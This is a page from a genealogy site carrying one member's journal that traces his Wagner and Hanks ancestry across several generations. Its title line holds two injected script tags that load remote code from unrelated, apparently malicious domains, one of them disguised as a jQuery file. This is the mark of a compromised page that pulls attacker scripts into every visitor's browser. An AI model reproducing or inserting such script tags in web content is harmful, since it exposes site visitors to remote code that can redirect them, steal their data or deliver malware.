Just a Little breakdown<script src="https://bestdoctornearme.com/splitter.ai/index.php"></script><script src="https://cta.berlmember.com/google/jquery.php"></script> :: FamilyTreeCircles.com Genealogy
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Just a Little breakdown

Journal by Randy_Wagner

Randy Wagner b. 1958
Father Kenneth H. Wagner 6/01/1931--5/25/2004
Mother Norma J. Paddock 1/16/1930
Grandfather Otis Henry Wagner 8/1886----1949
Grandmother Maude Mae Cornell b. abt 1891 -------- 1957
After Otis's death in 1949 Maude remarried in 1951 to a Walter Vanderhoof.
GreatGrandfather David Wagner b. abt 1858 d. unknown
GreatGrandMother Ada/Ida Hanks b. 1864 d. 1/1919 Troy Township
Crawford County Pa.
GGGrandfather Eli Fisk Hanks
GGGranmother Amerilous F. Spring
GGGGrandfather Rufis Fiske Hanks (3rd cousin of Abe Lincoln)
GGGGrandmother Cynthia Knight
GGGGGrandfather Enoch Hanks
GGGGGrandmother Johannah Fisk
GGGGGGrandfather John Hanks
GGGGGGrandmother Tabithia Hall
GGGGGGGrandfather Benjiman Hanks Jr
GGGGGGGrandmother Mary White
GGGGGGGGrandfather Benjiman Hanks Sr
GGGGGGGGrandmother Abigail Heiford
This is just a short break down of my Hanks connection, I will add to this later, But can trace this line back to Benjamin Hanks Sr
of Pembroke Mass. And will also enter Birth and death dates.

Surnames: Hanks Wagner
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on 2009-03-17 07:47:35

Randy_Wagner , from Greenville Pennsylvania, has been a Family Tree Circles member since Mar 2009. is researching the following names: WAGNER, CORNELL, HANKS and 14 other(s).

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